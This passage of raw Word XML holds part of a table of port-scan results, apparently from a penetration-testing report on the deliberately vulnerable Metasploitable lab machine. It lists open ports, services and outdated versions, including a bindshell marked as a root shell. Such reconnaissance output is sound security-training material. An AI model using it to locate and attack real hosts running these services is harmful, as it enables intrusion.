                <w:lang w:val="lt-LT"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004558A7">
              <w:rPr>
                <w:rFonts w:eastAsia="MS Mincho"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>1099/tcp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1419" w:type="pct"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="FFFFFF" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="7E68EA25" w14:textId="12EC7872" w:rsidR="004558A7" w:rsidRPr="004558A7" w:rsidRDefault="004558A7" w:rsidP="004558A7">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:eastAsia="MS Mincho"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004558A7">
              <w:rPr>
                <w:rFonts w:eastAsia="MS Mincho"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>java-rmi</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1639" w:type="pct"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="1" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="FFFFFF" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="19EB7B24" w14:textId="311B9B74" w:rsidR="004558A7" w:rsidRPr="004558A7" w:rsidRDefault="004558A7" w:rsidP="004558A7">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:eastAsia="MS Mincho"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004558A7">
              <w:rPr>
                <w:rFonts w:eastAsia="MS Mincho"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>GNU Classpath grmiregistry</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004558A7" w:rsidRPr="004558A7" w14:paraId="1226C35A" w14:textId="77777777" w:rsidTr="004558A7">
        <w:trPr>
          <w:jc w:val="right"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1942" w:type="pct"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="FFFFFF" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="5B39B242" w14:textId="3A9F23B6" w:rsidR="004558A7" w:rsidRPr="004558A7" w:rsidRDefault="004558A7" w:rsidP="007C32E1">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:eastAsia="MS Mincho"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004558A7">
              <w:rPr>
                <w:rFonts w:eastAsia="MS Mincho"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>1524/tcp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1419" w:type="pct"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="FFFFFF" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="4F786E69" w14:textId="3EB4AB02" w:rsidR="004558A7" w:rsidRPr="004558A7" w:rsidRDefault="004558A7" w:rsidP="007C32E1">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:eastAsia="MS Mincho"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004558A7">
              <w:rPr>
                <w:rFonts w:eastAsia="MS Mincho"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>bindshell</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1639" w:type="pct"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="1" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="FFFFFF" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="5A308337" w14:textId="2C72C593" w:rsidR="004558A7" w:rsidRPr="004558A7" w:rsidRDefault="004558A7" w:rsidP="007C32E1">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:eastAsia="MS Mincho"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004558A7">
              <w:rPr>
                <w:rFonts w:eastAsia="MS Mincho"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>Metasploitable root shell</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004558A7" w:rsidRPr="004558A7" w14:paraId="0DA8E91F" w14:textId="77777777" w:rsidTr="004558A7">
        <w:trPr>
          <w:jc w:val="right"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1942" w:type="pct"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="FFFFFF" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="74211C86" w14:textId="3E8138CC" w:rsidR="004558A7" w:rsidRPr="004558A7" w:rsidRDefault="004558A7" w:rsidP="007C32E1">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:eastAsia="MS Mincho"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004558A7">
              <w:rPr>
                <w:rFonts w:eastAsia="MS Mincho"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>2049/tcp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1419" w:type="pct"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="FFFFFF" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="35502FCD" w14:textId="1A2B40F2" w:rsidR="004558A7" w:rsidRPr="004558A7" w:rsidRDefault="004558A7" w:rsidP="007C32E1">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:eastAsia="MS Mincho"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004558A7">
              <w:rPr>
                <w:rFonts w:eastAsia="MS Mincho"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>nfs</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1639" w:type="pct"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="1" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="FFFFFF" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="60468D55" w14:textId="11054134" w:rsidR="004558A7" w:rsidRPr="004558A7" w:rsidRDefault="004558A7" w:rsidP="007C32E1">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:eastAsia="MS Mincho"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004558A7">
              <w:rPr>
                <w:rFonts w:eastAsia="MS Mincho"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>2-4 (RPC #100003)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004558A7" w:rsidRPr="004558A7" w14:paraId="31274594" w14:textId="77777777" w:rsidTr="004558A7">
        <w:trPr>
          <w:jc w:val="right"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1942" w:type="pct"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="FFFFFF" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="2F773EEF" w14:textId="3158E8A1" w:rsidR="004558A7" w:rsidRPr="004558A7" w:rsidRDefault="004558A7" w:rsidP="007C32E1">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:eastAsia="MS Mincho"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004558A7">
              <w:rPr>
                <w:rFonts w:eastAsia="MS Mincho"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>2121/tcp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1419" w:type="pct"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="FFFFFF" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="0CB61E02" w14:textId="42CB8C75" w:rsidR="004558A7" w:rsidRPr="004558A7" w:rsidRDefault="004558A7" w:rsidP="007C32E1">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:eastAsia="MS Mincho"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004558A7">
              <w:rPr>
                <w:rFonts w:eastAsia="MS Mincho"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>ftp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1639" w:type="pct"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="1" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="FFFFFF" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="41A9FBA2" w14:textId="6E000CE7" w:rsidR="004558A7" w:rsidRPr="004558A7" w:rsidRDefault="004558A7" w:rsidP="007C32E1">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:eastAsia="MS Mincho"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004558A7">
              <w:rPr>
                <w:rFonts w:eastAsia="MS Mincho"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>ProFTPD 1.3.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004558A7" w:rsidRPr="004558A7" w14:paraId="7A4B0262" w14:textId="77777777" w:rsidTr="004558A7">
        <w:trPr>
          <w:jc w:val="right"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1942" w:type="pct"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="FFFFFF" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="4AA4FC6E" w14:textId="07559DDC" w:rsidR="004558A7" w:rsidRPr="004558A7" w:rsidRDefault="004558A7" w:rsidP="007C32E1">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:eastAsia="MS Mincho"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004558A7">
              <w:rPr>
                <w:rFonts w:eastAsia="MS Mincho"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>3306/tcp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1419" w:type="pct"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="FFFFFF" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="3674F49C" w14:textId="1E655C1C" w:rsidR="004558A7" w:rsidRPr="004558A7" w:rsidRDefault="004558A7" w:rsidP="007C32E1">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:eastAsia="MS Mincho"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004558A7">
              <w:rPr>
                <w:rFonts w:eastAsia="MS Mincho"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>mysql</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1639" w:type="pct"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="1" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="FFFFFF" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="3FD8C6AF" w14:textId="41E2C2F4" w:rsidR="004558A7" w:rsidRPr="004558A7" w:rsidRDefault="004558A7" w:rsidP="007C32E1">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:eastAsia="MS Mincho"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004558A7">
              <w:rPr>
                <w:rFonts w:eastAsia="MS Mincho"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>MySQL 5.0.51a-3ubuntu5</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004558A7" w:rsidRPr="004558A7" w14:paraId="6599B8C1" w14:textId="77777777" w:rsidTr="004558A7">
        <w:trPr>
          <w:jc w:val="right"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1942" w:type="pct"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="FFFFFF" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="2000052E" w14:textId="0466D313" w:rsidR="004558A7" w:rsidRPr="004558A7" w:rsidRDefault="004558A7" w:rsidP="007C32E1">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:eastAsia="MS Mincho"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004558A7">
              <w:rPr>
                <w:rFonts w:eastAsia="MS Mincho"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>5432/tcp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1419" w:type="pct"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="FFFFFF" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="3BD37613" w14:textId="1C168933" w:rsidR="004558A7" w:rsidRPr="004558A7" w:rsidRDefault="004558A7" w:rsidP="007C32E1">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:eastAsia="MS Mincho"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004558A7">
              <w:rPr>
                <w:rFonts w:eastAsia="MS Mincho"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>postgresql</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1639" w:type="pct"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="1" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="FFFFFF" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="3A6591DE" w14:textId="033902D7" w:rsidR="004558A7" w:rsidRPr="004558A7" w:rsidRDefault="004558A7" w:rsidP="007C32E1">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:eastAsia="MS Mincho"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004558A7">
              <w:rPr>
                <w:rFonts w:eastAsia="MS Mincho"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>PostgreSQL DB 8.3.0 - 8.3.7</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004558A7" w:rsidRPr="004558A7" w14:paraId="60D0687F" w14:textId="77777777" w:rsidTr="004558A7">
        <w:trPr>
          <w:jc w:val="right"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1942" w:type="pct"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="FFFFFF" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="5551AC6A" w14:textId="2B8F81AC" w:rsidR="004558A7" w:rsidRPr="004558A7" w:rsidRDefault="004558A7" w:rsidP="007C32E1">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:eastAsia="MS Mincho"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004558A7">
              <w:rPr>
                <w:rFonts w:eastAsia="MS Mincho"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>5900/tcp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1419" w:type="pct"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="FFFFFF" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="3950325A" w14:textId="7339E649" w:rsidR="004558A7" w:rsidRPr="004558A7" w:rsidRDefault="004558A7" w:rsidP="007C32E1">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:eastAsia="MS Mincho"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004558A7">
              <w:rPr>
                <w:rFonts w:eastAsia="MS Mincho"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>vnc</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1639" w:type="pct"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="1" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="FFFFFF" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="54A88A59" w14:textId="1B5BA953" w:rsidR="004558A7" w:rsidRPr="004558A7" w:rsidRDefault="004558A7" w:rsidP="007C32E1">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:eastAsia="MS Mincho"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004558A7">
              <w:rPr>
                <w:rFonts w:eastAsia="MS Mincho"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>VNC (protocol 3.3)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004558A7" w:rsidRPr="004558A7" w14:paraId="69F27C92" w14:textId="77777777" w:rsidTr="004558A7">
        <w:trPr>
          <w:jc w:val="right"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1942" w:type="pct"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="FFFFFF" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="1B8A92E3" w14:textId="7E7C1443" w:rsidR="004558A7" w:rsidRPr="004558A7" w:rsidRDefault="004558A7" w:rsidP="007C32E1">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:eastAsia="MS Mincho"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004558A7">
              <w:rPr>
                <w:rFonts w:eastAsia="MS Mincho"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>6000/tcp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1419" w:type="pct"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="FFFFFF" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="2E31CC95" w14:textId="64FA9FA6" w:rsidR="004558A7" w:rsidRPr="004558A7" w:rsidRDefault="004558A7" w:rsidP="007C32E1">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:eastAsia="MS Mincho"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004558A7">
              <w:rPr>
                <w:rFonts w:eastAsia="MS Mincho"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>X11</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1639" w:type="pct"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="1" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="FFFFFF" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="478239DC" w14:textId="03207E3E" w:rsidR="004558A7" w:rsidRPr="004558A7" w:rsidRDefault="004558A7" w:rsidP="007C32E1">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:eastAsia="MS Mincho"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004558A7">
              <w:rPr>
                <w:rFonts w:eastAsia="MS Mincho"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>(access denied)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004558A7" w:rsidRPr="004558A7" w14:paraId="2FFA5EB7" w14:textId="77777777" w:rsidTr="004558A7">
        <w:trPr>
          <w:jc w:val="right"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1942" w:type="pct"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="FFFFFF" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="16A1CA1A" w14:textId="4E74F1D2" w:rsidR="004558A7" w:rsidRPr="004558A7" w:rsidRDefault="004558A7" w:rsidP="007C32E1">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:eastAsia="MS Mincho"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004558A7">
              <w:rPr>
                <w:rFonts w:eastAsia="MS Mincho"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>6667/tcp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1419" w:type="pct"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="FFFFFF" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="57D311D9" w14:textId="6AD55AD1" w:rsidR="004558A7" w:rsidRPr="004558A7" w:rsidRDefault="004558A7" w:rsidP="007C32E1">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:eastAsia="MS Mincho"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004558A7">
              <w:rPr>
                <w:rFonts w:eastAsia="MS Mincho"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>irc</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1639" w:type="pct"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="1" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="FFFFFF" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="576099D5" w14:textId="5498F210" w:rsidR="004558A7" w:rsidRPr="004558A7" w:rsidRDefault="004558A7" w:rsidP="007C32E1">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:eastAsia="MS Mincho"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004558A7">
              <w:rPr>
                <w:rFonts w:eastAsia="MS Mincho"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>UnrealIRCd</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004558A7" w:rsidRPr="004558A7" w14:paraId="1C8860FC" w14:textId="77777777" w:rsidTr="004558A7">
        <w:trPr>
          <w:jc w:val="right"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1942" w:type="pct"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="FFFFFF" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="1E978ADD" w14:textId="0C177BB7" w:rsidR="004558A7" w:rsidRPr="004558A7" w:rsidRDefault="004558A7" w:rsidP="007C32E1">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:eastAsia="MS Mincho"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004558A7">
              <w:rPr>
                <w:rFonts w:eastAsia="MS Mincho"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>8009/tcp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1419" w:type="pct"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="FFFFFF" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="36B6F88F" w14:textId="6BB545DD" w:rsidR="004558A7" w:rsidRPr="004558A7" w:rsidRDefault="004558A7" w:rsidP="007C32E1">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
